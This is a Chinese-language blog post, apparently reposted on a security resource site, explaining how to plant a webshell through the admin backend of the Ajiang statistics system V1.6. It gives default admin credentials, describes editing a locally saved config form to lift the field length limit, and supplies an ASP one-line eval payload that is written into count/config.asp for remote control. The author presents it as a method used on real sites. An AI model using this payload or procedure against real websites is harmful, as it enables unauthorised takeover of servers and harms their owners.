阿江统计系统V1.6后台拿SHELL的方法

2023-12-04 0 730

无奈到了自己这里今天下午又碰到个一样的站 纠结···

不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析·(我自己硬是整了半个小时没整出来利用方法·)

阿江统计系统V1.6后台拿SHELL的方法

此后台默认的账号密码是 admin admin ,ITlearnerITlearner

先进后台

阿江统计系统V1.6后台拿SHELL的方法

来到修改配置界面 保存源文件到本地

本地打开源文件 找到原文章访问量 把maxlength="10 修改为 maxlength="100下边是修改后的截图

阿江统计系统V1.6后台拿SHELL的方法

然后在本地文件修改action地址 例如IE 中的提交地址是upload/2011/1/201101071923425208.jpg" width="581" onload="resizepic(this)" height="50" alt="" />

然后保存文件 用IE 打开 在网站访问量地址后写入0:Eval(Request(chr(112)))

阿江统计系统V1.6后台拿SHELL的方法

这个一句话的密码是P点击修改 一句话就被插到了 count/config.asp 这个文件了 打开一句话客户端就可以连接了

阿江统计系统V1.6后台拿SHELL的方法

只是个自己积累的小小的过程 对于网上关于阿江统计拿SHELL的方法我也测试了很多 但是没几个能成功的 所以专门写了这个文章出来 其实就是本地修改下字节 因为源程序中限制了写入的字节数 没有什么技术含量 不要骂我···

文章作者:冰鱼

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 入侵防御 阿江统计系统V1.6后台拿SHELL的方法 https://www.u-9.cn/security/fangyu/72697.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务